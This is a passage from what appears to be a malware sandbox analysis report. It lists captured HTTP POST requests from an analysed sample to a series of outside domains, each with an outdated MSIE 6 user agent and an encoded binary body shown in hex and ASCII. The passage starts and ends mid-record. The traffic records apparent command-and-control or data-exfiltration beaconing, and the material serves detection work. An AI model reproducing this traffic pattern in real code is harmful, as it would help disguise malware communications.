77 64 46 42 50 6d 49 4a 75 39 57 48 2b 6d 74 6c 50 73 75 35 63 Data Ascii: BaDXrkqALstssXtjrfMinA1wTdX67foPHmcM8/sRcSPHtUwzydGKyyYo6Q70DUiRVsNYjjKKUQ4gAqGqef9lY2zJNhPZssA66/LpIfd4Y1n5eQI3O3gQRf3aoA5dc/YnYLx51RNlfKm2t+SE9bJHrAraqvEZDLWxrRyTPdq+VE+F/SDbU49CAHXX9K8i66Jt+X20xk+lVuafFpz1Vu9ZghDKHgzRLcRKB78Oc32r6e4+V+ZK9bPSoDHFxNLz+yE+PEINc7kvTdaTjMvzvjAiWc6D0FWjCdgAsp4A7ZRsFhxINz9zfXHvzQWiqj9Yf4fh9TyKlk2lnZ3EYqP8eWGvCZhSL6lvSivJpFDFKnlV1ERuYmmQogTL+NsHpSLoFOFCVe1jTWo9r8dVqNjJ/k+fgrsR1NiyTE6PezTTs/6lKQoLqiNo8VaODSN9r2N6WfzqojEgZ+W5kumzgjKgqxyScczJpQ1dEVqjA2Y7o4+++LDt9mbki5DJtyMbmnysZkDADZ2vDtCkK7jYLvl6da7/NRi7PLHqdOWwdFBPmIJu9WH+mtlPsu5c
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 52 78 4e 65 49 45 69 41 4f 73 73 49 6b 70 4c 61 69 79 65 4d 5a 4c 75 36 79 50 37 51 47 47 51 77 2f 46 66 6b 75 72 41 50 42 2b 45 41 48 4d 36 51 70 48 35 55 71 76 35 45 71 46 39 74 69 78 4f 6e 79 6e 4a 2f 71 72 34 42 6a 75 6c 52 72 4c 70 48 53 7a 38 46 39 62 4a 6b 41 47 31 37 34 46 34 2f 43 52 35 30 2f 67 2b 5a 65 4b 70 4c 31 66 67 58 2b 67 58 45 73 74 6d 57 55 52 56 4b 57 57 57 30 4a 4a 37 42 6a 43 46 45 6e 43 38 76 6d 4f 65 2b 4f 31 71 51 4b 65 73 4b 57 76 39 33 59 4b 66 38 44 30 64 2f 4e 74 4f 76 68 6a 58 51 38 47 57 4c 37 49 58 77 7a 38 38 63 62 41 39 46 78 78 6a 51 6f 78 4e 59 6f 56 55 46 57 46 65 65 4e 6d 62 46 68 77 65 38 49 42 4d 55 43 50 62 4e 6a 2f 50 49 56 5a 64 72 32 71 4f 4a 66 6b 6a 75 41 67 4b 69 31 77 2f 53 2f 68 66 52 2f 77 48 6e 30 6d 72 58 53 72 2b 74 61 2b 55 39 65 4e 6e 7a 34 71 39 56 6e 30 32 70 35 63 38 63 54 38 2b 50 66 63 69 71 79 52 43 38 74 57 6b 4f 37 7a 58 54 34 4f 34 64 59 41 69 54 54 44 69 4f 48 6a 74 7a 35 54 67 57 2f 4b 38 63 75 4c 46 32 2f 77 37 42 7a 75 53 59 30 46 49 6c 2b 56 47 7a 4e 76 65 56 57 2f 2b 73 52 6b 56 48 70 4b 47 2f 6b 4f 75 66 75 71 57 47 2b 49 53 4d 73 68 36 45 64 54 34 44 36 2b 78 59 41 50 5a 44 76 77 30 64 59 75 38 52 79 31 4a 78 4f 46 6e 6c 6c 67 5a 6a 31 2b 62 6b 73 39 32 30 38 62 6a 42 6a 4c 59 6c 6c 50 4d 48 37 2f 5a 53 69 4d 65 4e 66 74 62 70 70 31 65 4b 6a 32 72 58 47 5a 6a 73 71 36 4c 37 74 70 50 6f 47 69 73 79 61 77 78 64 6b 53 44 53 64 44 6e 41 77 52 54 48 57 4f 31 34 49 47 49 54 62 50 4e 6d 68 2f 39 41 42 47 6b 70 42 4b 77 4f 51 6c 57 35 4c 6e 33 68 51 56 47 74 56 50 76 79 44 33 71 46 33 4c 54 30 6d 74 57 4a 72 71 70 68 6c 70 68 36 75 64 37 4a 32 78 32 54 6f 4c 6a 38 4e 76 31 63 62 58 6e 76 42 72 67 6e 41 6c 69 62 72 51 77 78 66 57 48 43 49 78 49 42 76 6d 39 4a Data Ascii: RxNeIEiAOssIkpLaiyeMZLu6yP7QGGQw/FfkurAPB+EAHM6QpH5Uqv5EqF9tixOnynJ/qr4BjulRrLpHSz8F9bJkAG174F4/CR50/g+ZeKpL1fgX+gXEstmWURVKWWW0JJ7BjCFEnC8vmOe+O1qQKesKWv93YKf8D0d/NtOvhjXQ8GWL7IXwz88cbA9FxxjQoxNYoVUFWFeeNmbFhwe8IBMUCPbNj/PIVZdr2qOJfkjuAgKi1w/S/hfR/wHn0mrXSr+ta+U9eNnz4q9Vn02p5c8cT8+PfciqyRC8tWkO7zXT4O4dYAiTTDiOHjtz5TgW/K8cuLF2/w7BzuSY0FIl+VGzNveVW/+sRkVHpKG/kOufuqWG+ISMsh6EdT4D6+xYAPZDvw0dYu8Ry1JxOFnllgZj1+bks9208bjBjLYllPMH7/ZSiMeNftbpp1eKj2rXGZjsq6L7tpPoGisyawxdkSDSdDnAwRTHWO14IGITbPNmh/9ABGkpBKwOQlW5Ln3hQVGtVPvyD3qF3LT0mtWJrqphlph6ud7J2x2ToLj8Nv1cbXnvBrgnAlibrQwxfWHCIxIBvm9J
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 30 2f 54 47 2b 4c 4b 57 4b 4d 75 77 34 73 43 56 35 59 62 72 63 4c 57 65 4d 2f 43 43 79 42 46 4e 42 75 67 54 32 61 32 2f 6d 57 51 4a 47 33 56 68 67 48 35 6e 37 2f 48 66 53 4a 34 39 49 54 30 65 31 71 6c 6f 46 68 76 72 4e 76 58 57 50 4e 6b 44 73 58 35 4e 6b 43 35 49 4c 79 2b 38 4f 7a 35 76 35 65 43 74 6d 47 4e 63 70 49 4d 6c 4a 79 4b 33 57 74 52 33 38 6e 49 76 5a 72 46 6d 76 72 75 4b 78 6a 67 38 2f 79 6b 63 46 39 71 72 61 6c 6d 65 5a 30 4f 67 63 77 44 36 31 34 6a 52 63 52 6c 75 51 30 59 54 70 55 2b 42 5a 55 33 62 73 7a 77 67 41 63 38 4f 41 58 6e 4e 61 73 6c 4a 37 53 62 4e 69 2f 68 53 58 75 74 35 46 48 32 6e 5a 67 67 51 52 65 48 2b 72 57 50 33 6a 64 4a 4d 75 57 38 4e 54 39 67 44 4a 4d 55 61 34 2f 42 58 4a 6d 46 74 57 49 57 58 64 34 6f 76 38 50 72 2f 61 64 44 43 30 4a 36 37 31 68 4f 6d 6a 36 75 5a 31 6d 7a 62 34 39 45 50 67 6a 56 54 5a 65 47 52 45 57 71 46 56 56 65 72 7a 58 6b 35 55 32 59 67 6a 68 61 57 44 59 38 75 49 6e 33 42 59 78 51 30 57 38 2f 6e 34 33 33 65 59 4f 63 36 37 49 49 56 33 42 45 6a 2f 68 54 43 38 67 4a 4a 77 4d 4e 78 37 63 51 57 65 78 69 30 69 54 52 46 6d 37 72 4b 43 4d 32 67 6d 42 6f 59 76 49 58 35 34 4e 69 57 30 77 31 36 54 4e 4a 4b 47 43 64 6e 4d 6f 52 59 7a 32 61 78 38 57 32 31 74 74 51 4d 63 58 69 49 76 6e 2f 31 41 43 34 50 65 53 50 6a 39 73 4b 58 48 2b 79 46 6d 33 4d 4c 6f 58 4e 4d 69 69 59 46 6f 38 54 41 47 44 62 36 57 51 34 2f 71 35 6c 46 67 42 48 32 6c 4b 4b 4c 69 79 77 57 53 69 67 66 41 42 48 57 59 74 48 4c 4f 78 4e 54 50 50 69 6d 62 56 65 79 7a 6c 76 66 4d 6a 36 68 34 4d 42 38 43 45 68 36 34 64 63 6a 6e 58 4a 44 37 4d 41 46 7a 5a 32 4a 2b 55 37 66 6a 63 52 59 64 6e 6b 64 66 59 61 31 4a 33 44 6e 4e 37 73 74 Data Ascii: 0/TG+LKWKMuw4sCV5YbrcLWeM/CCyBFNBugT2a2/mWQJG3VhgH5n7/HfSJ49IT0e1qloFhvrNvXWPNkDsX5NkC5ILy+8Oz5v5eCtmGNcpIMlJyK3WtR38nIvZrFmvruKxjg8/ykcF9qralmeZ0OgcwD614jRcRluQ0YTpU+BZU3bszwgAc8OAXnNaslJ7SbNi/hSXut5FH2nZggQReH+rWP3jdJMuW8NT9gDJMUa4/BXJmFtWIWXd4ov8Pr/adDC0J671hOmj6uZ1mzb49EPgjVTZeGREWqFVVerzXk5U2YgjhaWDY8uIn3BYxQ0W8/n433eYOc67IIV3BEj/hTC8gJJwMNx7cQWexi0iTRFm7rKCM2gmBoYvIX54NiW0w16TNJKGCdnMoRYz2ax8W21ttQMcXiIvn/1AC4PeSPj9sKXH+yFm3MLoXNMiiYFo8TAGDb6WQ4/q5lFgBH2lKKLiywWSigfABHWYtHLOxNTPPimbVeyzlvfMj6h4MB8CEh64dcjnXJD7MAFzZ2J+U7fjcRYdnkdfYa1J3DnN7st
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 42 6e 68 2f 41 53 6a 66 4b 4d 73 53 35 6f 58 5a 36 7a 68 55 6f 5a 76 59 50 58 34 77 41 62 61 6a 33 48 52 6b 67 4f 48 49 6a 56 54 37 57 50 34 32 41 7a 5a 58 6f 37 49 47 59 56 4b 70 68 6c 79 59 2f 67 48 52 73 6e 58 4f 6d 6c 63 32 31 4e 44 69 44 4b 52 72 62 35 6a 70 51 39 4b 70 43 6f 48 2f 56 4f 43 33 42 48 79 37 69 58 48 57 76 7a 68 33 42 69 6c 79 49 64 6c 68 4d 52 69 35 31 70 6b 78 30 6e 61 48 5a 5a 43 71 72 6c 35 54 31 79 4c 68 33 6a 30 78 4a 58 6d 52 2f 57 2b 34 4f 56 39 30 55 6f 55 6a 73 46 34 6f 62 69 4c 53 35 62 38 44 4a 57 76 6c 61 54 34 51 7a 48 55 52 64 38 79 31 46 39 34 6c 76 39 34 71 58 75 71 33 6b 2b 56 59 57 66 76 6c 75 77 46 50 5a 72 2f 4d 71 32 50 4e 7a 6e 71 77 47 59 73 31 65 65 73 78 34 4d 74 41 32 43 44 45 56 6f 6b 34 4a 75 73 54 52 75 72 47 71 4f 4e 4a 6b 68 33 6f 6e 4a 72 30 6d 32 2b 59 72 54 72 4d 58 32 4d 67 58 66 61 4a 4d 35 67 6a 4d 50 71 57 6b 36 39 46 75 58 30 38 4e 56 37 62 67 4e 65 65 73 35 4b 2b 76 2b 71 4c 6b 31 77 68 7a 76 63 70 4d 45 52 72 4e 45 78 37 72 73 55 41 50 69 4f 59 6a 36 6b 49 48 51 2f 48 45 45 6d 52 64 4d 37 6e 45 73 43 61 68 6d 62 46 4d 78 50 49 4d 49 72 4d 42 2b 43 39 75 72 51 68 63 74 76 2b 55 37 34 6c 35 6b 73 4e 7a 71 59 35 4b 57 62 35 58 4f 4f 4c 57 57 47 4a 36 74 78 51 4c 69 43 6d 68 6c 57 72 5a 4e 56 2b 63 6e 64 5a 58 55 63 6c 64 2f 58 44 63 68 4f 76 7a 57 57 46 70 75 53 79 6c 78 62 6e 34 67 53 4d 31 75 64 65 35 73 74 6a 71 4b 47 79 33 59 38 6d 76 70 2b 31 33 44 73 37 33 64 57 62 74 67 30 48 73 65 38 75 61 59 63 54 31 46 35 41 55 52 42 56 2b 33 6f 76 2f 41 79 6c 71 75 55 65 62 65 39 4b 52 30 57 41 39 70 54 61 35 69 4c 67 71 42 65 52 77 51 4f 42 69 67 59 57 33 70 61 79 49 68 55 61 2b 74 74 48 66 56 42 55 76 73 6c 4f 44 34 2f 39 57 31 2f 35 47 57 36 62 72 74 6c 33 4a 54 36 74 78 51 3d 3d Data Ascii: Bnh/ASjfKMsS5oXZ6zhUoZvYPX4wAbaj3HRkgOHIjVT7WP42AzZXo7IGYVKphlyY/gHRsnXOmlc21NDiDKRrb5jpQ9KpCoH/VOC3BHy7iXHWvzh3BilyIdlhMRi51pkx0naHZZCqrl5T1yLh3j0xJXmR/W+4OV90UoUjsF4obiLS5b8DJWvlaT4QzHURd8y1F94lv94qXuq3k+VYWfvluwFPZr/Mq2PNznqwGYs1eesx4MtA2CDEVok4JusTRurGqONJkh3onJr0m2+YrTrMX2MgXfaJM5gjMPqWk69FuX08NV7bgNees5K+v+qLk1whzvcpMERrNEx7rsUAPiOYj6kIHQ/HEEmRdM7nEsCahmbFMxPIMIrMB+C9urQhctv+U74l5ksNzqY5KWb5XOOLWWGJ6txQLiCmhlWrZNV+cndZXUcld/XDchOvzWWFpuSylxbn4gSM1ude5stjqKGy3Y8mvp+13Ds73dWbtg0Hse8uaYcT1F5AURBV+3ov/AylquUebe9KR0WA9pTa5iLgqBeRwQOBigYW3payIhUa+ttHfVBUvslOD4/9W1/5GW6brtl3JT6txQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 78 53 78 4b 48 67 70 76 4f 73 75 4d 49 77 66 76 62 5a 4b 65 72 73 30 4d 2b 36 43 36 6b 2f 2f 69 33 70 6e 2b 56 70 69 4c 4b 2b 42 70 46 61 64 4b 78 71 38 7a 34 47 48 57 47 4e 64 50 77 77 51 71 76 4b 48 4a 30 6e 5a 73 66 72 5a 4b 46 2f 7a 45 37 62 45 42 48 42 4d 4e 58 4c 46 47 6a 72 2f 79 65 43 68 78 65 55 35 59 47 48 6f 78 61 44 2f 67 6d 62 33 6f 35 50 76 45 48 6d 32 46 61 7a 65 68 73 62 4e 37 65 72 48 5a 72 77 6c 53 4b 2b 4a 41 6f 38 4b 4e 49 6a 64 53 75 42 42 51 62 71 55 55 65 76 4e 39 50 73 2f 6f 65 6f 76 7a 6b 57 44 39 39 64 75 31 59 70 6b 2f 7a 79 6f 53 74 38 62 30 6f 65 6f 62 7a 35 54 70 51 33 2b 64 47 4b 77 4f 48 55 4b 62 62 75 4e 70 41 34 64 33 42 32 72 63 6b 43 73 62 44 39 77 49 4c 43 67 51 44 35 53 6e 59 4b 75 79 71 64 70 75 78 34 5a 71 42 7a 57 66 4b 53 48 30 33 6a 36 38 43 6c 54 4f 55 58 68 4a 61 42 4e 6b 6d 59 5a 75 43 2f 78 70 43 49 51 41 39 66 35 74 37 61 61 4f 36 37 67 39 43 2b 4f 2f 79 67 6d 46 71 6e 57 56 4d 4f 45 34 67 37 44 79 45 4e 2b 5a 6b 7a 46 35 46 57 57 38 74 53 70 73 36 66 6d 56 7a 56 54 76 47 54 74 65 69 73 67 53 67 71 69 73 4e 66 4f 50 4e 6b 79 77 58 30 69 37 51 31 34 73 2b 4c 47 4a 74 53 30 4f 6a 33 36 57 6e 79 35 55 43 37 34 47 6d 53 64 48 37 41 72 72 77 78 53 66 65 30 59 47 38 71 70 77 54 50 77 35 71 2f 68 4f 42 37 6b 45 6c 66 4e 53 34 75 45 71 49 69 6d 69 73 65 6b 6b 62 62 62 56 68 6a 31 4d 2b 53 64 6d 6a 51 6b 79 6f 58 74 72 73 66 76 2b 4d 62 6a 4d 52 4e 74 68 44 46 68 4a 7a 7a 52 4f 4e 78 79 62 34 7a 77 78 4e 73 65 4f 67 44 53 4d 4f 71 2b 6f 38 46 39 6c 4d 67 32 73 32 74 6c 4f 6a 58 58 4a 52 66 78 4b 68 35 41 6b 64 63 73 6b 57 67 6f 37 53 4a 73 73 46 70 42 61 6f 6b 31 41 6c 2b 6e 4f 77 38 7a 53 2b 42 6f 3d Data Ascii: xSxKHgpvOsuMIwfvbZKers0M+6C6k//i3pn+VpiLK+BpFadKxq8z4GHWGNdPwwQqvKHJ0nZsfrZKF/zE7bEBHBMNXLFGjr/yeChxeU5YGHoxaD/gmb3o5PvEHm2FazehsbN7erHZrwlSK+JAo8KNIjdSuBBQbqUUevN9Ps/oeovzkWD99du1Ypk/zyoSt8b0oeobz5TpQ3+dGKwOHUKbbuNpA4d3B2rckCsbD9wILCgQD5SnYKuyqdpux4ZqBzWfKSH03j68ClTOUXhJaBNkmYZuC/xpCIQA9f5t7aaO67g9C+O/ygmFqnWVMOE4g7DyEN+ZkzF5FWW8tSps6fmVzVTvGTteisgSgqisNfOPNkywX0i7Q14s+LGJtS0Oj36Wny5UC74GmSdH7ArrwxSfe0YG8qpwTPw5q/hOB7kElfNS4uEqIimisekkbbbVhj1M+SdmjQkyoXtrsfv+MbjMRNthDFhJzzRONxyb4zwxNseOgDSMOq+o8F9lMg2s2tlOjXXJRfxKh5AkdcskWgo7SJssFpBaok1Al+nOw8zS+Bo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 31 7a 4c 6c 68 2f 58 63 50 63 75 37 6b 65 77 47 58 4d 6d 4a 79 4f 34 51 4a 77 65 44 53 30 30 45 2b 53 67 78 71 4a 6c 30 64 75 42 51 35 61 49 6e 33 35 76 76 43 6d 39 72 35 76 6c 67 4c 39 61 52 48 39 76 4e 55 4b 34 6e 50 64 56 74 41 31 33 33 73 64 39 41 71 56 75 57 73 6f 44 36 34 73 33 48 55 34 6a 46 79 48 70 55 61 56 68 79 4a 72 2b 43 67 6f 6a 64 42 4d 64 4d 4e 48 42 47 57 63 79 32 51 4e 2b 66 56 41 50 32 2b 57 68 71 51 4a 76 7a 56 2b 6d 30 5a 35 6a 6a 46 45 74 35 41 62 6f 46 5a 55 2f 47 6b 77 77 62 42 70 33 41 75 34 73 70 49 6e 50 32 59 31 62 41 50 6b 51 63 46 53 75 79 72 41 4e 51 55 47 56 4e 76 69 71 6f 74 4f 59 53 64 2b 76 39 39 64 62 6b 4f 36 4c 42 68 34 50 32 68 57 69 6d 6b 39 48 76 6f 59 6f 6f 35 43 58 47 30 2b 2f 69 49 4c 4e 45 54 46 76 30 38 6f 55 49 56 33 74 6d 59 41 57 67 37 39 2b 39 43 7a 77 69 38 49 36 6e 50 32 6e 49 77 69 2b 4d 53 4c 47 6e 6c 68 6e 6d 55 4b 56 6d 33 6f 6a 70 4a 4f 63 37 35 74 79 49 6b 6e 67 68 36 7a 69 53 2b 49 51 32 37 46 71 4b 71 4f 6e 5a 4a 4f 61 4d 5a 53 47 61 72 77 45 67 76 61 6f 37 59 55 70 66 39 65 36 32 45 50 71 7a 39 79 71 6f 33 56 32 68 42 62 38 77 37 69 38 56 7a 52 44 50 52 63 4f 34 7a 42 59 67 78 6c 62 6a 31 75 4e 52 30 31 56 34 5a 78 4a 69 32 42 59 58 51 53 68 46 53 50 75 38 43 65 44 54 51 2f 61 32 34 45 42 66 78 41 7a 2b 33 77 54 72 6a 64 65 43 6a 66 2f 67 4b 68 36 6b 73 36 45 41 44 47 6c 50 2b 69 34 53 50 4c 6a 4f 35 51 33 2b 4b 42 64 78 58 74 35 49 4c 35 68 49 48 36 46 6d 62 56 77 48 59 70 4a 62 33 70 63 52 44 79 47 43 4c 6e 48 34 67 6b 39 55 64 61 4d 37 53 6e 4e 78 76 64 64 55 72 2b 53 75 6c 77 7a 72 65 73 65 69 34 49 57 53 54 7a 33 53 69 6c 39 6b 2b 6e 69 69 7a 41 3d 3d Data Ascii: 1zLlh/XcPcu7kewGXMmJyO4QJweDS00E+SgxqJl0duBQ5aIn35vvCm9r5vlgL9aRH9vNUK4nPdVtA133sd9AqVuWsoD64s3HU4jFyHpUaVhyJr+CgojdBMdMNHBGWcy2QN+fVAP2+WhqQJvzV+m0Z5jjFEt5AboFZU/GkwwbBp3Au4spInP2Y1bAPkQcFSuyrANQUGVNviqotOYSd+v99dbkO6LBh4P2hWimk9HvoYoo5CXG0+/iILNETFv08oUIV3tmYAWg79+9Czwi8I6nP2nIwi+MSLGnlhnmUKVm3ojpJOc75tyIkngh6ziS+IQ27FqKqOnZJOaMZSGarwEgvao7YUpf9e62EPqz9yqo3V2hBb8w7i8VzRDPRcO4zBYgxlbj1uNR01V4ZxJi2BYXQShFSPu8CeDTQ/a24EBfxAz+3wTrjdeCjf/gKh6ks6EADGlP+i4SPLjO5Q3+KBdxXt5IL5hIH6FmbVwHYpJb3pcRDyGCLnH4gk9UdaM7SnNxvddUr+Sulwzresei4IWSTz3Sil9k+niizA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 42 61 44 58 72 6b 71 41 4c 73 74 73 73 58 74 6a 72 66 4d 69 6e 41 31 77 54 64 58 36 37 66 6f 50 48 6d 63 4d 38 2f 73 52 63 53 50 48 74 55 77 7a 79 64 47 4b 79 79 59 6f 36 51 37 30 44 55 69 52 56 73 4e 59 6a 6a 4b 4b 55 51 34 67 41 71 47 71 65 66 39 6c 59 32 7a 4a 4e 68 50 5a 73 73 41 36 36 2f 4c 70 49 66 64 34 59 31 6e 35 65 51 49 33 4f 33 67 51 52 66 33 61 6f 41 35 64 63 2f 59 6e 59 4c 78 35 31 52 4e 6c 66 4b 6d 32 74 2b 53 45 39 62 4a 48 72 41 72 61 71 76 45 5a 44 4c 57 78 72 52 79 54 50 64 71 2b 56 45 2b 46 2f 53 44 62 55 34 39 43 41 48 58 58 39 4b 38 69 36 36 4a 74 2b 58 32 30 78 6b 2b 6c 56 75 61 66 46 70 7a 31 56 75 39 5a 67 68 44 4b 48 67 7a 52 4c 63 52 4b 42 37 38 4f 63 33 32 72 36 65 34 2b 56 2b 5a 4b 39 62 50 53 6f 44 48 46 78 4e 4c 7a 2b 79 45 2b 50 45 49 4e 63 37 6b 76 54 64 61 54 6a 4d 76 7a 76 6a 41 69 57 63 36 44 30 46 57 6a 43 64 67 41 73 70 34 41 37 5a 52 73 46 68 78 49 4e 7a 39 7a 66 58 48 76 7a 51 57 69 71 6a 39 59 66 34 66 68 39 54 79 4b 6c 6b 32 6c 6e 5a 33 45 59 71 50 38 65 57 47 76 43 5a 68 53 4c 36 6c 76 53 69 76 4a 70 46 44 46 4b 6e 6c 56 31 45 52 75 59 6d 6d 51 6f 67 54 4c 2b 4e 73 48 70 53 4c 6f 46 4f 46 43 56 65 31 6a 54 57 6f 39 72 38 64 56 71 4e 6a 4a 2f 6b 2b 66 67 72 73 52 31 4e 69 79 54 45 36 50 65 7a 54 54 73 2f 36 6c 4b 51 6f 4c 71 69 4e 6f 38 56 61 4f 44 53 4e 39 72 32 4e 36 57 66 7a 71 6f 6a 45 67 5a 2b 57 35 6b 75 6d 7a 67 6a 4b 67 71 78 79 53 63 63 7a 4a 70 51 31 64 45 56 71 6a 41 32 59 37 6f 34 2b 2b 2b 4c 44 74 39 6d 62 6b 69 35 44 4a 74 79 4d 62 6d 6e 79 73 5a 6b 44 41 44 5a 32 76 44 74 43 6b 4b 37 6a 59 4c 76 6c 36 64 61 37 2f 4e 52 69 37 50 4c 48 71 64 4f 57 77 64 46 42 50 6d 49 4a 75 39 57 48 2b 6d 74 6c 50 73 75 35 63 Data Ascii: BaDXrkqALstssXtjrfMinA1wTdX67foPHmcM8/sRcSPHtUwzydGKyyYo6Q70DUiRVsNYjjKKUQ4gAqGqef9lY2zJNhPZssA66/LpIfd4Y1n5eQI3O3gQRf3aoA5dc/YnYLx51RNlfKm2t+SE9bJHrAraqvEZDLWxrRyTPdq+VE+F/SDbU49CAHXX9K8i66Jt+X20xk+lVuafFpz1Vu9ZghDKHgzRLcRKB78Oc32r6e4+V+ZK9bPSoDHFxNLz+yE+PEINc7kvTdaTjMvzvjAiWc6D0FWjCdgAsp4A7ZRsFhxINz9zfXHvzQWiqj9Yf4fh9TyKlk2lnZ3EYqP8eWGvCZhSL6lvSivJpFDFKnlV1ERuYmmQogTL+NsHpSLoFOFCVe1jTWo9r8dVqNjJ/k+fgrsR1NiyTE6PezTTs/6lKQoLqiNo8VaODSN9r2N6WfzqojEgZ+W5kumzgjKgqxyScczJpQ1dEVqjA2Y7o4+++LDt9mbki5DJtyMbmnysZkDADZ2vDtCkK7jYLvl6da7/NRi7PLHqdOWwdFBPmIJu9WH+mtlPsu5c
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 64 50 56 77 52 4b 56 4d 54 4d 75 51 61 37 52 65 54 4a 58 31 63 52 34 4d 55 6e 2f 7a 62 45 48 47 71 54 74 57 73 54 6d 4d 45 55 50 41 41 48 75 69 51 50 4b 59 63 2f 49 48 47 73 66 79 6c 44 71 55 65 46 46 68 67 48 78 70 53 59 54 34 77 46 38 31 36 6e 58 2b 38 4f 67 36 49 72 77 2b 69 59 4e 4d 4c 73 68 74 67 65 43 4a 73 76 52 6a 4d 58 34 37 32 34 47 50 72 68 36 48 62 6f 5a 53 35 59 7a 7a 31 78 56 78 41 4f 76 56 54 79 53 6e 59 61 54 77 35 4b 39 4e 39 57 7a 42 74 51 52 45 39 50 32 2b 61 75 79 71 57 75 4c 63 75 46 4f 6b 6e 46 35 50 44 35 32 4f 54 30 61 56 67 4b 42 5a 69 53 74 69 32 4c 46 6d 4b 59 49 72 6d 45 70 4e 34 79 32 41 53 61 42 4c 72 37 74 4e 37 35 4d 4c 6e 39 48 56 48 69 30 33 41 54 77 38 61 41 77 2f 76 51 4c 41 55 78 31 66 45 6a 6d 54 59 6b 68 69 6b 2f 70 74 44 6c 6b 4b 4c 47 4c 38 74 6b 50 78 57 47 58 42 58 2b 4e 63 53 55 75 4d 46 69 7a 79 68 4f 30 4c 31 6b 59 4b 65 73 52 36 4b 62 76 4c 76 74 46 77 4b 77 2b 6a 73 44 75 53 62 57 48 64 43 52 2b 69 56 58 2f 62 77 6d 4a 53 64 67 5a 30 63 46 42 71 30 6b 54 7a 76 42 63 44 52 39 2f 61 4a 72 46 37 35 6c 69 62 6e 46 46 63 71 76 67 6f 43 4c 47 62 52 53 76 4e 48 79 39 5a 63 72 4e 7a 52 57 57 37 73 4f 73 55 6a 2f 70 2b 6f 58 62 30 6c 62 4e 2b 66 56 63 54 6e 45 30 39 45 43 4d 30 5a 71 48 66 65 2f 52 62 2b 57 71 52 68 51 4a 66 57 46 31 38 48 54 66 4b 58 2f 4b 31 51 55 65 79 7a 69 4d 5a 35 73 53 7a 6e 58 71 5a 54 4c 47 38 33 53 64 69 66 39 4f 36 64 67 4a 38 74 2f 63 76 73 51 54 57 4a 4f 78 4e 31 67 49 76 37 36 36 6e 79 30 48 42 35 67 32 52 75 38 43 70 75 59 30 6e 74 30 43 32 69 58 65 71 4a 4f 47 70 57 74 76 50 55 6f 77 5a 55 69 4a 49 48 67 71 76 79 41 3d 3d Data Ascii: dPVwRKVMTMuQa7ReTJX1cR4MUn/zbEHGqTtWsTmMEUPAAHuiQPKYc/IHGsfylDqUeFFhgHxpSYT4wF816nX+8Og6Irw+iYNMLshtgeCJsvRjMX4724GPrh6HboZS5Yzz1xVxAOvVTySnYaTw5K9N9WzBtQRE9P2+auyqWuLcuFOknF5PD52OT0aVgKBZiSti2LFmKYIrmEpN4y2ASaBLr7tN75MLn9HVHi03ATw8aAw/vQLAUx1fEjmTYkhik/ptDlkKLGL8tkPxWGXBX+NcSUuMFizyhO0L1kYKesR6KbvLvtFwKw+jsDuSbWHdCR+iVX/bwmJSdgZ0cFBq0kTzvBcDR9/aJrF75libnFFcqvgoCLGbRSvNHy9ZcrNzRWW7sOsUj/p+oXb0lbN+fVcTnE09ECM0ZqHfe/Rb+WqRhQJfWF18HTfKX/K1QUeyziMZ5sSznXqZTLG83Sdif9O6dgJ8t/cvsQTWJOxN1gIv766ny0HB5g2Ru8CpuY0nt0C2iXeqJOGpWtvPUowZUiJIHgqvyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 70 6f 76 43 51 2f 31 47 54 4d 76 5a 6e 50 59 4b 74 46 78 4d 34 6a 62 77 68 53 67 72 51 68 31 52 67 58 66 51 46 31 62 72 53 52 43 59 7a 66 76 41 4d 7a 5a 57 6d 6d 68 54 58 57 52 53 50 33 55 2b 6e 44 35 46 38 71 71 35 44 38 45 42 4b 45 46 6f 6e 59 79 71 67 47 59 49 51 68 48 74 5a 30 7a 51 4c 64 4d 58 73 43 58 51 64 33 6f 53 43 67 65 50 48 63 46 6e 5a 61 6e 4f 55 52 6a 4f 69 79 2b 57 63 6e 47 6e 41 61 66 58 65 42 4b 63 6f 73 36 6a 66 57 79 6e 56 46 6d 46 52 69 49 50 42 67 6b 78 49 70 59 75 54 50 6d 4d 35 57 66 77 4c 43 57 30 77 2f 4b 62 57 6f 2b 33 78 39 70 61 78 6a 79 66 32 49 68 45 39 62 66 39 73 74 69 63 32 32 6f 2f 6e 4a 50 2b 52 4e 54 50 77 5a 6e 52 68 43 55 4b 74 6b 68 44 44 69 79 79 36 46 4b 36 4a 52 49 56 56 77 6f 33 5a 70 43 36 50 4e 76 52 53 72 76 5a 